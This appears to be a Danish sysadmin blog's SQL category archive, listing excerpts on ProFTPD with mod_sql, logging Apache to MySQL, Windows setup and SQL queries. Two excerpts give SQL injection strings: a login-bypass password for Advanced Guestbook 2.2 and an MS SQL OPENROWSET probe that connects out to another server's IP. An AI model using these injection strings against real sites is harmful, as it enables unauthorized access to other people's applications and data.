Kategoriarkiv: SQL

ProFTPD via MySQL

ProFTPD via MySQL With mod_sql you can handle your user authentication in ProFTPD via an MySQL table. Required is a fresh compiled actual ProFTPD with mod_sql enabled. Enable mod_sql ./configure –with-modules=mod_sql:mod_sql_mysql First you should create an new datebase named “proftpd” … Læs resten

Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar

sql til mod_sql_log

smid mod_sql_log ind: http://www.outoforder.cc/projects/apache/mod_log_sql/’ guide: http://www.linux-mag.com/2002-10/lamp_01.html sæt flg i mod_sql_log.conf: LogSQLLoginInfo localhost apache KoDe LogSQLSocketFile /var/run/mysql/mysql.sock LogSQLDatabase apache LogSQLCreateTables On LogSQLMassVirtualHosting On LogSQLPreserveFile apache_queries.sql nice queries: # sidste 30 besøg med lidt relevant data SELECT remote_host, request_uri, bytes_sent, status, FROM_UNIXTIME(time_stamp) … Læs resten

Udgivet i Apache, Knowledge Base, Old Base, SQL | Skriv en kommentar

Penetrating Advanced Guestbook 2.2

vuln. to sql injection, use following as password and blank username: <code> ‘) OR (‘a’ = ‘a </code>

Udgivet i Knowledge Base, SQL | Skriv en kommentar

Apache, php & mysql on Windows

Fetch: http://archive.apache.org/dist/httpd/binaries/win32/apache_1.3.29-win32-x86-no_src.exe doubleclick the file and follow the install: Network domain should be ‘localhost’ Server name should be ‘127.0.0.1’ Admin email should be your email. Otherwise just leave the defaults, after install your apache should be running. Fetch php windows … Læs resten

Udgivet i Apache, Knowledge Base, Networking, Old Base, PHP, SQL | Skriv en kommentar

Opsætning af ProFTPD+mod_sql

ProFTPD+mod_sql De fleste linux distributioner kommer idag med en ftpserver. Rigtig mange bruger ProFTPD som standard ftpserver. En alm. installation af ProFTPD bruger operativsystemets egen brugerdatabase, men der er faktisk mulighed for at bruge mange andre former for login. En … Læs resten

Udgivet i Knowledge Base, Linux, Networking, Old Base, SQL | Skriv en kommentar

Apache logfiles in MySQL

The database: Database changed mysql> describe weblog; +————-+————–+——+—–+———+—————-+ | Field | Type | Null | Key | Default | Extra | +————-+————–+——+—–+———+—————-+ | ID | int(11) | | PRI | NULL | auto_increment | | remotehost | varchar(255) | | … Læs resten

Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar

Pen test, SQL Injection

Here’s the string you can drop in web form inputs to see if they’re vulnerable to SQL injection (on Microsoft SQL server anyway): ‘; select * from OPENROWSET(‘SQLOLEDB’,’192.168.0.1′;;,’select @@version’)– To verify results, replace the IP address w/ that of the … Læs resten

Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar

Advancerede SQL queries

vis alle værdier fra chart_entry og use fra chart_list hvor chart_entry.id svarer til chart_list.nummer og kun en for hvert nummer i chart_list og begræns søgningen til uge 48. select chart_entry.*,chart_list.uge from chart_entry,chart_list where chart_entry.id=chart_list.nummer and uge=’48’; Lidt kryptisk, jeg fatter … Læs resten

Udgivet i Knowledge Base, Old Base, Programmering, SQL | Skriv en kommentar

SQL Match på unix timestamps

select time from system.weblog where time < UNIX_TIMESTAMP(‘2003-11-21 16:00’);  

Udgivet i Knowledge Base, Old Base, Programmering, SQL | Skriv en kommentar

Creating users in mysql

root@chilibeans:~# mysql -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 4023 to server version: 3.23.54 Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. mysql> create … Læs resten

Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar